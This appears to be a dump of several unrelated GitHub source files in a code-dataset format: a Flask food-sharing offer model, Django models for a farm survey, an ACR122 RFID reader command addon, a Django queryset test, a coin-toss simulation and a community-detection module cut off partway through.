content['portions_number']\n offer.pickup_longitude = content['pickup_longitude']\n offer.pickup_latitude = content['pickup_latitude']\n offer.pickup_times = content['pickup_times']\n offer.offer_expiry = content['offer_expiry']\n offer.description = content['description']\n offer.photo = photo_url\n\n OffersTags.query.filter_by(offer_id=content['id']).delete()\n\n for tag in content.get('tags', []):\n OffersTags.add_offer_tag(content['id'], tag['tag_id'])\n db.session.commit()\n\n @staticmethod\n def get_all_offers():\n return Offer.query.all()\n\n @staticmethod\n def get_active_offers():\n return Offer.query.filter_by(active=True) \\\n .filter(Offer.offer_expiry >= datetime.now())\n\n @staticmethod\n def get_offer_by_id(offer_id):\n return Offer.query.filter_by(id=offer_id).first()\n\n @staticmethod\n def get_current_offers_of_user(user_id):\n return Offer.query.filter_by(user_id=user_id) \\\n .filter(Offer.active == True) \\\n .filter(Offer.offer_expiry >= datetime.now()) \\\n .order_by(desc(Offer.post_time))\n\n @staticmethod\n def get_all_active_offers_except_mine(user_id):\n return Offer.query.filter_by(active=True) \\\n .filter(Offer.user_id != user_id) \\\n .filter(Offer.offer_expiry >= datetime.now())\n\n @staticmethod\n def check_tags(offers, tags_ids):\n if tags_ids is None:\n return offers\n elif not tags_ids:\n return offers\n elif tags_ids is not None:\n return offers\\\n .join(OffersTags)\\\n .filter(OffersTags.tag_id.in_(tags_ids))\\\n .group_by(Offer.id)\n # .having(array_agg(OffersTags.tag_id).contains(tags_ids))\n\n\n @staticmethod\n def sort_by_distance_from_user(offers, user_lon, user_lat):\n return offers.order_by(\n (func.degrees(\n func.acos(\n func.sin(func.radians(user_lat)) * func.sin(func.radians(Offer.pickup_latitude)) +\n func.cos(func.radians(user_lat)) * func.cos(func.radians(Offer.pickup_latitude)) *\n func.cos(func.radians(user_lon-Offer.pickup_longitude))\n )\n ) * 60 * 1.1515 * 1.609344))\n\n @staticmethod\n def sort_by_owner_ranking(offers):\n return offers\\\n .join(User, Offer.user_id == User.id)\\\n .join(SharerRating, SharerRating.to_user_id == User.id)\\\n .group_by(SharerRating.to_user_id, Offer.id)\\\n .order_by(desc(func.avg(SharerRating.rating)))","repo_name":"jasiekg25/foodsharing","sub_path":"services/backend/app/api/models/offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"73033371155","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom lugar.models import Comunidad, Municipio, Departamento, Pais\nfrom geoposition.fields import GeopositionField\n\n# Create your models here.\nclass Entrevistado(models.Model):\n nombre = models.CharField(max_length=200)\n fecha_nacimiento = models.DateField()\n\n class Meta:\n verbose_name_plural = 'Entrevistados'\n\n def __unicode__(self):\n return self.nombre\n\nclass DuenoFinca(models.Model):\n nombre = models.CharField(max_length=200)\n fecha_nacimiento = models.DateField()\n\n class Meta:\n verbose_name_plural = 'Dueños Fincas'\n\n def __unicode__(self):\n return self.nombre\n \nclass Organizacion(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Organizaciones'\n\n def __unicode__(self):\n return self.nombre\n\nclass Recolector(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Recolector'\n\n def __unicode__(self):\n return self.nombre\n\nCHOICE_SEXO = (\n (1, 'Hombre'),\n (2, 'Mujer'),\n (3, 'Mancomunado'),\n )\n\n#1.1\nclass Encuesta(models.Model):\n fecha = models.DateField('Fecha de recolección de datos')\n recolector = models.ForeignKey(Recolector)\n nombre = models.ForeignKey(Entrevistado, verbose_name=u'Nombre de entrevistado/a')\n cedula = models.CharField(max_length=50)\n dueno = models.ForeignKey(DuenoFinca, verbose_name='Dueño de la finca')\n sexo = models.IntegerField('Sexo del dueño de la finca', choices=CHOICE_SEXO)\n finca = models.CharField('Nombre de la finca', max_length=200, \n null=True, blank=True)\n pais = models.ForeignKey(Pais)\n departamento = models.ForeignKey(Departamento)\n municipio = models.ForeignKey(Municipio)\n comunidad = models.ForeignKey(Comunidad)\n position = position = GeopositionField(null=True, blank=True)\n altitud = models.IntegerField('altitud promedio',null=True, blank=True)\n beneficiarios = models.ManyToManyField(Organizacion, null=True, blank=True)\n\n\n class Meta:\n verbose_name_plural = '1.1 Información general '\n\n def __unicode__(self):\n return self.nombre.nombre\n#1.2\nclass SocioOrganizacion(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = \"Socios organizaciones\"\n\n def __unicode__(self):\n return self.nombre\n\nCHOICE_DESDE = (\n (1, 'Menos de 5 años'),\n (2, 'Más de 5 años'),\n (3, 'Ninguno'),\n )\n\nclass Beneficios(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Beneficio'\n verbose_name_plural = 'Beneficios'\n\n def __unicode__(self):\n return self.nombre\n\nclass CreditoE(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'credito'\n verbose_name_plural = 'creditos'\n\n def __unicode__(self):\n return self.nombre\n\nclass DeQuien(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Organizaciones que dan credito'\n verbose_name_plural = 'Organizaciones que dan creditos'\n\n def __unicode__(self):\n return self.nombre\n \nclass QuienFinancia(models.Model):\n socio = models.ManyToManyField(SocioOrganizacion, related_name=\"socios\")\n desde = models.IntegerField(choices=CHOICE_DESDE, null=True, blank=True)\n beneficio_ser_socio = models.ManyToManyField(Beneficios, \n related_name=\"beneficiario_socio\",\n null=True, blank=True)\n tiene_credito = models.ManyToManyField(CreditoE, \n related_name=\"credito\",\n null=True, blank=True)\n de_quien = models.ManyToManyField(DeQuien, related_name=\"quien\",\n null=True, blank=True)\n\n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n verbose_name_plural = '1.2 Organización'\n\n def __unicode__(self):\n return \n \n#1.3\nclass ViveFamilia(models.Model):\n nombre = models.CharField(max_length=200)\n class Meta:\n \n verbose_name_plural = 'Vive Familias'\n\n def __unicode__(self):\n return self.nombre\n\nCHOICE_EDUCACION = (\n (1, 'NSLE'),\n (2, 'PRIn'),\n (3, 'PRC'),\n (4, 'SECIN'),\n (5, 'Bach'),\n (6, 'Univ'),\n )\n\nclass Composicion(models.Model):\n adultos = models.IntegerField('adultos varones', null=True, blank=True)\n adultas = models.IntegerField('adultas mujeres', null=True, blank=True)\n jovenes_varones = models.IntegerField(null=True, blank=True)\n jovenes_mujeres = models.IntegerField(null=True, blank=True)\n ninos = models.IntegerField('niños', null=True, blank=True)\n ninas = models.IntegerField('niñas', null=True, blank=True)\n permanente_hombres = models.IntegerField(null=True, blank=True)\n permanente_mujeres = models.IntegerField(null=True, blank=True)\n temporales_hombres = models.IntegerField(null=True, blank=True)\n temporales_mujeres = models.IntegerField(null=True, blank=True)\n tecnico_hombres = models.IntegerField(null=True, blank=True)\n tecnico_mujeres = models.IntegerField(null=True, blank=True)\n relacion_finca_vivienda = models.ForeignKey(ViveFamilia,null=True, blank=True)\n educacion_dueno = models.IntegerField('Nivel de educación de dueño de la finca?', \n choices=CHOICE_EDUCACION,null=True, blank=True)\n educacion_maxima_hombre = models.IntegerField('Nivel máximo de hombres de la finca?',\n choices=CHOICE_EDUCACION,null=True, blank=True)\n educacion_maxima_mujeres = models.IntegerField('Nivel máximo de las mujeres de la finca?',\n choices=CHOICE_EDUCACION,null=True, blank=True)\n\n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n \n verbose_name_plural = '1.3 Composición del grupo familiar'\n\n def __unicode__(self):\n return self.encuesta.nombre.nombre\n\n#1.4\nclass EnergiaFinca(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'EnergiaFinca'\n verbose_name_plural = 'EnergiaFincas'\n\n def __unicode__(self):\n return self.nombre\n\nclass Combustible(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Combustible en la cocina'\n verbose_name_plural = 'Combustibles en la cocina'\n\n def __unicode__(self):\n return self.nombre\n\nclass AguaFinca(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Disponibilidad de agua en la finca'\n verbose_name_plural = 'Disponibilidad de agua en la fincas'\n\n def __unicode__(self):\n return self.nombre\n \nclass ServiciosBasicos(models.Model):\n electricidad = models.ManyToManyField(EnergiaFinca, related_name=\"electricidad\",\n null=True, blank=True)\n combustible = models.ManyToManyField(Combustible, related_name=\"combustible\",\n null=True, blank=True)\n agua_trabajo_finca = models.ManyToManyField(AguaFinca, related_name=\"trabaja\",\n null=True, blank=True)\n agua_consumo_humano = models.ManyToManyField(AguaFinca, related_name=\"consumo\",\n null=True, blank=True)\n\n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n verbose_name_plural = '1.4 Servicios básicos en la finca'\n\n def __unicode__(self):\n pass\n \n#1.5\nCHOICE_PARCELA = (\n (1, 'Propia con escritura pública'),\n (2, 'Propias con Promesa de venta'),\n (3, 'Arrendada'),\n (4, 'Propia por herencia'),\n (5, 'Propias con título de reforma agraria'),\n (6, 'Parcela en tierra comunitaria'),\n (7, 'Sin documento'),\n )\nCHOICE_DOCUMENTO = (\n (1, 'Hombre'),\n (2, 'Mujer'),\n (3, 'Mancomunado'),\n (4, 'Parientes'),\n (5, 'Colectivo'),\n (6, 'No hay'),\n )\n\nclass Tenecia(models.Model):\n tipo = models.IntegerField('Tipo de tenencia de parcela', choices=CHOICE_PARCELA)\n documento = models.IntegerField('Documento legal de la parcela, a nombre de quién', \n choices=CHOICE_DOCUMENTO)\n\n encuesta = models.ForeignKey(Encuesta)\n \n class Meta:\n verbose_name_plural = '1.5 Tenencia de la tierras'\n\n def __unicode__(self):\n pass\n \n\n#1.6\nCHOICE_ALIMENTOS_COMPRA = (\n (1, 'Todo'),\n (2, 'Más de la Mitad'),\n (3, 'Menos de la Mitad'),\n (4, 'Nada '),\n \n )\n\nCHOICE_SI_NO = (\n (1, 'Si'),\n (2, 'No'),\n \n )\n\nclass NecesidadAlimento(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Necesidad Alimentos'\n\n def __unicode__(self):\n return self.nombre\n \nclass Meses(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Meses del año'\n\n def __unicode__(self):\n return self.nombre\n\nclass TiemposCrisis(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Tiempo de crisis'\n\n def __unicode__(self):\n return self.nombre\n \nclass Seguridad(models.Model):\n compra_alimento = models.IntegerField('¿Qué parte de alimentos básicos que consume la familia o la en la finca se compra?',\n choices=CHOICE_ALIMENTOS_COMPRA,null=True, blank=True)\n cubrir_necesidades = models.IntegerField('¿Siente que en algunos años no ha podido cubrir las necesidades básicas de alimentación de la familia o la finca? ',\n choices=CHOICE_SI_NO,null=True, blank=True)\n porque_no_cubre = models.ManyToManyField(NecesidadAlimento,related_name=\"cubre\",\n verbose_name=u'¿Porque motivo no se ha podido cubrir las necesidades de alimentos de la familia o la finca?',\n null=True, blank=True)\n meses_dificiles = models.ManyToManyField(Meses, related_name=\"dificiles\",\n verbose_name=u'¿Cuáles son los meses más difíciles para la alimentación de la familia o la finca?',\n null=True, blank=True)\n soluciones_crisis = models.ManyToManyField(TiemposCrisis, related_name=\"crisis\",\n verbose_name=u'¿Qué soluciones y practicas implementa en los tiempos de crisis o escasez de alimentos?',\n null=True, blank=True)\n \n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n \n verbose_name_plural = '1.6 Seguridad alimentaria de la familia'\n\n def __unicode__(self):\n pass\n","repo_name":"CARocha/estudiocafe","sub_path":"encuesta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11164,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"35393499667","text":"#!/usr/bin/python2.6\nfrom apdu.apduExecuter import *\nfrom arg.args import *\nfrom arg.argchecker import *\nfrom arg.resultHandler import *\n\nfrom addons.iso7816_4 import iso7816_4APDUBuilder\nfrom apdu.apdu import ApduDefault\nfrom apdu.exception import apduBuilderException\nfrom smartcard.sw.SWExceptions import CheckingErrorException\n\n\nacr122SW = {\n 0x61:(None, \n {0x00: \"Sucess !!!\",\n None: \"Bytes available : \"}),\n 0x63:(CheckingErrorException, \n {0x00: \"Operation failed\",\n 0x01: \"Timeout Error : the card does not answer\",\n 0x27: \"The checksum of the Contactless Response is wrong\",\n 0x7F: \"The PN532_Contactless Command is wrong.\"})\n}\n#TODO load somewhere\n\nclass acr122SamAPDUBuilder(iso7816_4APDUBuilder):\n \n @staticmethod \n def directTransmit(args):\n \"acr122 transmit data to pn532\"\n \n if len(args) < 1 or len(args) > 255:\n raise apduBuilderException(\"invalid args size, must be a list from 1 to 255 item, got \"+str(len(datas)))\n \n return ApduDefault(cla=0xFF,ins=0x00,p1=0x00,p2=0x00,data=args)\n \n @staticmethod\n def getResponse(Length):\n \"acr122 get response from pn532\"\n \n if Length < 1 or Length > 255:\n raise apduBuilderException(\"invalid argument Length, must be a value between 1 and 255, got \"+str(Length))\n \n return ApduDefault(cla=0xFF,ins=0xC0,p1=0x00,p2=0x00,expected_answer=Length)\n \n LinkToBuzzerOff = 0x00\n LinkToBuzzerDuringT1 = 0x01\n LinkToBuzzerDuringT2 = 0x02\n LinkToBuzzerDuringT1AndT2 = 0x03\n \n @staticmethod\n def ledAndBuzzerControl(initialRed,initialGreen,finalRed,finalGreen,T1Duration,T2Duration,Repetition,LinkToBuzzer):\n \"acr122 manage led and buzzer\"\n \n P2 = 0\n \n if finalRed != None:\n if finalRed:\n P2 |= 0x01\n P2 |= 0x04\n \n if finalGreen != None:\n if finalGreen:\n P2 |= 0x02\n P2 |= 0x08\n \n if initialRed != None:\n if initialRed:\n P2 |= 0x10\n P2 |= 0x40\n \n if initialGreen != None:\n if initialGreen:\n P2 |= 0x20\n P2 |= 0x80 \n \n if T1Duration < 1 or T1Duration > 255:\n raise apduBuilderException(\"invalid argument T1Duration, must be a value between 1 and 255, got \"+str(T1Duration))\n \n if T2Duration < 1 or T2Duration > 255:\n raise apduBuilderException(\"invalid argument T2Duration, must be a value between 1 and 255, got \"+str(T2Duration))\n \n if Repetition < 1 or Repetition > 255:\n raise apduBuilderException(\"invalid argument Repetition, must be a value between 1 and 255, got \"+str(Repetition))\n \n if LinkToBuzzer < 0 or LinkToBuzzer > 3:\n raise apduBuilderException(\"invalid argument LinkToBuzzer, must be a value between 0 and 4, got \"+str(LinkToBuzzer))\n \n return ApduDefault(cla=0xFF,ins=0x00,p1=0x40,p2=P2,data=[T1Duration,T2Duration,Repetition,LinkToBuzzer])\n \n @staticmethod\n def getFirmwareVersion():\n \"acr122 firmware version\"\n return ApduDefault(cla=0xFF,ins=0x00,p1=0x48,p2=0x01)\n \ndef acr122execute(envi,args):\n apdu = acr122SamAPDUBuilder.directTransmit(args)\n \n apduAnswer = executeAPDU(apdu)\n \n if apduAnswer.sw1 == 0x61:\n apdu = acr122SamAPDUBuilder.getResponse(apduAnswer.sw2)\n return executeAPDU(envi,apdu)\n else:\n pass #TODO\n \ni = IntegerArgChecker(1,255)\n\nExecuter.addCommand(CommandStrings=[\"acr122\",\"firmware\"], preProcess=acr122SamAPDUBuilder.getFirmwareVersion ,process=executeAPDU, postProcess=resultHandlerAPDUAndConvertDataAndSWToString)\nExecuter.addCommand(CommandStrings=[\"acr122\",\"transmit\"], preProcess=acr122SamAPDUBuilder.directTransmit ,process=executeAPDU, argChecker=AllTheSameChecker(hexaArgChecker(),\"args\"))\nExecuter.addCommand(CommandStrings=[\"acr122\",\"response\"], preProcess=acr122SamAPDUBuilder.getResponse ,process=executeAPDU, argChecker=DefaultArgsChecker([(\"Length\",i)]), postProcess=resultHandlerAPDUAndPrintDataAndSW)\n\nt = tokenValueArgChecker({\"off\":False,\"on\":True,\"default\":None})\nt2 = tokenValueArgChecker({\"off\":acr122SamAPDUBuilder.LinkToBuzzerOff,\"t1\":acr122SamAPDUBuilder.LinkToBuzzerDuringT1,\"t2\":acr122SamAPDUBuilder.LinkToBuzzerDuringT2,\"both\":acr122SamAPDUBuilder.LinkToBuzzerDuringT1AndT2})\n\nExecuter.addCommand(CommandStrings=[\"acr122\",\"ledbuzzer\"], preProcess=acr122SamAPDUBuilder.ledAndBuzzerControl ,process=executeAPDU, argChecker=DefaultArgsChecker([(\"initialRed\",t),(\"initialGreen\",t),(\"finalRed\",t),(\"finalGreen\",t),(\"T1Duration\",i),(\"T2Duration\",i),(\"Repetition\",i),(\"LinkToBuzzer\",t2)]))\nExecuter.addCommand(CommandStrings=[\"acr122\",\"execute\"], preProcess=acr122execute ,process=executeAPDU, argChecker=AllTheSameChecker(hexaArgChecker(),\"args\"), postProcess=printResultHandler)\n\n\n","repo_name":"djoproject/old.RFIDShell","sub_path":"src/addons/acr122V1.py","file_name":"acr122V1.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"23448089295","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom capstoneproject.models.querysets.category_queryset \\\n import CategoryQuerySet\nfrom capstoneproject.models.models.category import Category\nfrom capstoneproject.models.models.user_storage import UserStorage\n\n\nclass CategoryQuerySetTestClass(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.cat1 = Category.categories.create(\n name='test_category1', weight=1, default=True)\n cls.cat2 = Category.categories.create(\n name='test_category2', weight=2, default=True)\n cls.cat3 = Category.categories.create(\n name='test_category3', weight=3, default=False)\n cls.cat4 = Category.categories.create(\n name='test_category4', weight=0, default=False)\n cls.cat5 = Category.categories.create(\n name='test_category5', weight=1, default=True)\n cls.user1 = User.objects.create_user(\n username='user1', password='12345')\n cls.user1.save()\n cls.user2 = User.objects.create_user(\n username='user2', password='12346')\n cls.user2.save()\n cls.user_storage1 = UserStorage.user_storage.get(user=cls.user1)\n cls.user_storage1.categories.add(cls.cat1)\n cls.user_storage1.categories.add(cls.cat2)\n cls.user_storage1.categories.add(cls.cat3)\n cls.user_storage1.save()\n cls.user_storage2 = UserStorage.user_storage.get(user=cls.user2)\n cls.user_storage2.categories.add(cls.cat1)\n cls.user_storage2.categories.add(cls.cat2)\n cls.user_storage2.categories.add(cls.cat4)\n cls.user_storage2.save()\n\n @classmethod\n def tearDownClass(cls):\n Category.categories.all().delete()\n User.objects.all().delete()\n UserStorage.user_storage.all().delete()\n\n def test_of_user(self):\n results = Category.categories.of_user(self.user1.id)\n self.assertIn(self.cat1, results)\n self.assertIn(self.cat2, results)\n self.assertIn(self.cat3, results)\n self.assertNotIn(self.cat4, results)\n self.assertIn(self.cat5, results)\n","repo_name":"jwillikers/content-rating","sub_path":"capstoneproject/tests/test_models/test_querysets/test_category_queryset.py","file_name":"test_category_queryset.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"41953925389","text":"import random\n\ndef toss_coin(p):\n return 'heads' if random.random() < p else 'tails'\n\ndef five_heads_in_a_row():\n count = 0\n for i in range(100000):\n coin = 'fair' if random.random() < 0.9 else 'loaded'\n result = ''\n if coin == 'fair':\n p = 0.5\n else:\n p = 0.9\n for j in range(5):\n result += toss_coin(p)\n if result == 'heads'*5:\n count += 1\n return count/100000\n\nprint(five_heads_in_a_row())","repo_name":"fadouaabdoul/BDAnalysis","sub_path":"Homework 5/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"20777876863","text":"from __future__ import division\nimport numpy as np\nimport os.path\n\n\"\"\"\nThis module implements community detection.\n\"\"\"\n\n__author__ = [\"Thomas Aynaud (thomas.aynaud@lip6.fr)\"]\n# Copyright (C) 2009 by\n# Thomas Aynaud \n# All rights reserved.\n# BSD license.\n\nimport networkx as nx\n\n\nclass ML2(object):\n __MIN = 0.000001\n __PASS_MAX = -1\n LOGOPERATIONS = False\n\n nbVertices = 0\n\n def __init__(self, graph, attributes, authorIndex):\n self.graph = graph\n self.graphBase = graph.copy()\n self.attributes = attributes\n self.nbVertices = len(graph)\n self.statusTab = []\n self.authorIndex = authorIndex\n\n # Build status structures\n status = Status()\n status.init(graph)\n self.statusTab.append(status)\n statusA = Status()\n statusA.initAttribStatus(graph, authorIndex, attributes)\n self.statusTab.append(statusA)\n\n self.status_list = list()\n\n def critereCombinaison(self):\n return (\n self.__modularity(self.statusTab[0]) + self.__modularity(self.statusTab[1])\n ) / 2.0\n\n def findPartition(self):\n giniMatrix = self.calculateGiniMatrixInitial()\n self.__one_level(giniMatrix=None)\n new_mod = self.critereCombinaison()\n\n partition, bijection = self.__renumber()\n\n self.status_list.append(partition)\n mod = new_mod\n self.induced_graph(partition)\n self.statusTab[0].init(self.graph)\n\n # if(args.verbose):\n # print(\"Inducing attrib status\")\n self.statusTab[1].inducedAttribStatusTab(partition, bijection)\n giniMatrix = self.firstInducedGiniMatrix(partition, giniMatrix)\n\n while True:\n self.__one_level(giniMatrix=giniMatrix)\n new_mod = self.critereCombinaison()\n if new_mod - mod < self.__MIN:\n break\n partition, bijection = self.__renumber()\n\n self.status_list.append(partition)\n\n mod = new_mod\n self.induced_graph(partition)\n giniMatrix = self.inducedGiniMatrix(partition, giniMatrix)\n\n self.statusTab[0].init(self.graph)\n\n if self.statusTab[1] != None:\n self.statusTab[1].inducedAttribStatusTab(partition, bijection)\n\n dendogram = self.status_list[:]\n\n # Generate and output partition\n partition = dendogram[0].copy()\n for index in range(1, len(dendogram)):\n for node, community in partition.items():\n partition[node] = dendogram[index][community]\n\n return partition\n\n def dist(self, v1, v2):\n attrV1 = self.attributes[v1]\n attrV2 = self.attributes[v2]\n distance = 0.0\n for attr, val1 in attrV1.items():\n val2 = attrV2.get(attr, 0.0)\n distance += (val1 - val2) ** 2\n for attr, val2 in attrV2.items():\n if not attr in attrV1:\n distance += val2 * val2\n return distance\n\n def distArray(self, v1, v2):\n attrV1 = self.attributes[v1]\n attrV2 = self.attributes[v2]\n distance = 0.0\n for i in range(len(attrV1)):\n distance += (attrV1[i] - attrV2[i]) ** 2\n return distance\n\n def firstInducedGiniMatrix(self, partition, giniMatrix):\n out = np.zeros([len(set(partition.values())), len(set(partition.values()))])\n # if(args.verbose):\n # pprint(giniMatrix)\n for i in partition:\n for j in partition:\n out[partition[i]][partition[j]] = giniMatrix[self.authorIndex[i]][\n self.authorIndex[j]\n ]\n return out\n\n def inducedGiniMatrix(self, partition, giniMatrix):\n # if(args.verbose):\n # print(\"inducedGiniMatrix...\")\n out = np.zeros([len(set(partition.values())), len(set(partition.values()))])\n for i in partition:\n for j in partition:\n out[partition[i]][partition[j]] = (\n out[partition[i]][partition[j]] + giniMatrix[i][j]\n )\n # if(args.verbose):\n # print(\"End inducedGiniMatrix\")\n\n return out\n\n def calculateGiniMatrixInitial(self):\n giniMatrix = {}\n for v1 in self.graph:\n giniMatrix[self.authorIndex[v1]] = {}\n np.zeros(self.nbVertices**2).reshape((self.nbVertices, self.nbVertices))\n for v1 in self.graph:\n for v2 in self.graph:\n d = (\n -1\n * self.dist(self.authorIndex[v1], self.authorIndex[v2])\n / self.nbVertices**2\n )\n giniMatrix[self.authorIndex[v1]][self.authorIndex[v2]] = d\n giniMatrix[self.authorIndex[v2]][self.authorIndex[v1]] = d\n \"\"\"\n print \"Calculating Gini Matrix Initial\"\n Y = pdist(self.attributes, 'sqeuclidean')\n print \"division\"\n Y = np.divide(Y, 0.0-float(len(self.attributes)**2))\n pprint(giniMatrix)\n pprint(squareform(Y))\n return squareform(Y)\n \"\"\"\n return giniMatrix\n\n def induced_graph(self, partition):\n newGraph = nx.Graph()\n newGraph.add_nodes_from(partition.values())\n\n # for node1, node2, datas in self.graph.edges_iter(data = True) :\n for node1, node2, datas in list(self.graph.edges(data=True)):\n weight = datas.get(\"weight\", 1)\n com1 = partition[node1]\n com2 = partition[node2]\n w_prec = newGraph.get_edge_data(com1, com2, {\"weight\": 0}).get(\"weight\", 1)\n newGraph.add_edge(com1, com2, weight=w_prec + weight)\n self.graph = newGraph\n\n def __renumber(self):\n count = 0\n dictionary = self.statusTab[0].node2com\n ret = dictionary.copy()\n new_values = dict([])\n for key in dictionary.keys():\n value = dictionary[key]\n new_value = new_values.get(value, -1)\n if new_value == -1:\n new_values[value] = count\n new_value = count\n count = count + 1\n ret[key] = new_value\n return ret, new_values\n\n def __one_level(self, giniMatrix=None):\n modif = True\n\n while modif:\n modif = False\n numNode = 0\n for node in self.graph.nodes():\n numNode = numNode + 1\n\n com_node = self.statusTab[0].node2com[node]\n best_com = com_node\n\n best_increase = 0\n neigh_communities = self.__neighcom(node, giniMatrix=giniMatrix)\n # if(args.verbose):\n # print(\"Neighb Communities of \" + str(node))\n # pprint(neigh_communities)\n\n degc_totw_tab = []\n\n for i in range(len(self.statusTab)):\n\n degc_totw_tab.append(\n self.statusTab[i].gdegrees.get(node, 0.0)\n / (self.statusTab[i].total_weight * 2.0)\n )\n theWeight = neigh_communities[com_node][i]\n\n if abs(self.statusTab[i].degrees[com_node]) <= abs(\n self.statusTab[i].gdegrees[node]\n ):\n self.statusTab[i].degrees[com_node] = abs(\n self.statusTab[i].gdegrees[node]\n )\n\n self.__remove(node, com_node, theWeight, self.statusTab[i])\n assert (\n self.statusTab[0].node2com[node] == self.statusTab[1].node2com[node]\n )\n\n # Find the best community\n for com, dnc in neigh_communities.items():\n incr = 0.0\n for i in range(len(self.statusTab)):\n totw = abs(self.statusTab[i].total_weight)\n if i == 0:\n a = (\n abs(dnc[i])\n - abs(\n self.statusTab[i].degrees.get(com, 0.0)\n * degc_totw_tab[i]\n )\n ) / totw\n incr += a\n else:\n a = (\n 0.0\n - abs(dnc[i])\n + abs(\n self.statusTab[i].degrees.get(com, 0.0)\n * degc_totw_tab[i]\n )\n ) / totw\n incr += a\n incr /= 2\n if incr > best_increase:\n best_increase = incr\n best_com = com\n\n for i in range(len(self.statusTab)):\n if best_com in neigh_communities:\n theWeight = neigh_communities[best_com][i]\n else:\n print(\n \"IS THAT POSSIBLE ???? (best_com not in neigh_communities)\"\n )\n exit(0)\n theWeight = 0\n self.__insert(node, best_com, theWeight, self.statusTab[i])\n\n if best_com != com_node:\n modif = True\n\n def __neighcom(self, node, giniMatrix=None):\n weights = {}\n voisins = self.graph[node].items()\n curCommunity = self.statusTab[0].node2com[node]\n if curCommunity not in weights:\n weights[curCommunity] = np.zeros([len(self.statusTab)])\n\n for neighbor, datas in voisins:\n if neighbor != node:\n weight = datas.get(\"weight\", 1)\n neighborcom = self.statusTab[0].node2com[neighbor]\n\n if neighborcom not in weights:\n weights[neighborcom] = np.zeros([len(self.statusTab)])\n\n # For the graph\n weights[neighborcom][0] = weights[neighborcom][0] + weight\n\n # For the attributes\n if giniMatrix is not None:\n weight = giniMatrix[node][neighbor]\n else:\n weight = (\n -1\n * self.dist(self.authorIndex[node], self.authorIndex[neighbor])\n / self.nbVertices**2\n )\n weights[neighborcom][1] = weights[neighborcom][1] + weight\n return weights\n\n def __remove(self, node, com, weight, status):\n status.degrees[com] = status.degrees.get(com, 0.0) - status.gdegrees.get(\n node, 0.0\n )\n status.internals[com] = float(\n status.internals.get(com, 0.0) - weight - status.loops.get(node, 0.0)\n )\n status.node2com[node] = -1\n\n def __insert(self, node, com, weight, status):\n status.node2com[node] = com\n status.degrees[com] = status.degrees.get(com, 0.0) + status.gdegrees.get(\n node, 0.0\n )\n status.internals[com] = float(\n status.internals.get(com, 0.0) + weight + status.loops.get(node, 0.0)\n )\n\n def __modularity(self, status):\n links = abs(float(status.total_weight))\n result = 0.0\n for community in set(status.node2com.values()):\n in_degree = abs(status.internals.get(community, 0.0))\n degree = abs(status.degrees.get(community, 0.0))\n expected = (degree / (2.0 * links)) ** 2\n found = in_degree / links\n if status.total_weight < 0:\n result += expected - found\n else:\n result += found - expected\n return result\n\n\nclass Status(object):\n \"\"\"\n To handle several data in one struct.\n Could be replaced by named tuple, but don't want to depend on python 2.6\n \"\"\"\n\n node2com = dict([])\n total_weight = 0\n internals = dict([])\n degrees = dict([])\n gdegrees = dict([])\n loops = dict([])\n\n def __str__(self):\n return (\n \"------------------------\\nnode2com : \"\n + str(self.node2com)\n + \"\\n degrees : \"\n + str(self.degrees)\n + \"\\n gdegrees : \"\n + str(self.gdegrees)\n + \"\\n internals : \"\n + str(self.internals)\n + \"\\n total_weight : \"\n + str(self.total_weight)\n + \"\\n loops:\"\n + str(self.loops)\n + \"\\n-----------------------\"\n )\n\n def initAttribStatus(self, graph, authorIndex, attributes):\n \"\"\"Initialize the status of an attributes list with every node in one community\"\"\"\n N = len(graph)\n count = 0\n\n # Compute the center of gravity using dict\n meanVector = {}\n for v, attrs in attributes.items():\n for attrId, attrValue in attrs.items():\n meanVector[attrId] = meanVector.get(attrId, 0.0) + attrValue\n for attrId, attrValue in meanVector.items():\n meanVector[attrId] = meanVector[attrId] / N\n\n variance = {}\n for node in sorted(graph.nodes()):\n for attrId, attrValue in meanVector.items():\n variance[attrId] = variance.get(attrId, 0.0) + (\n (attrValue - attributes[authorIndex[node]].get(attrId, 0.0)) ** 2\n )\n inertieTot = 0.0\n for v in variance.values():\n inertieTot += v / N\n\n self.total_weight = 0.0 - inertieTot\n\n for node in sorted(graph.nodes()):\n self.node2com[node] = count\n\n # Compute the distance to the center of gravity\n distanceToCenterOfGravity = 0.0\n for attrId, attrValue in meanVector.items():\n distanceToCenterOfGravity += (\n attrValue - attributes[authorIndex[node]].get(attrId, 0.0)\n ) ** 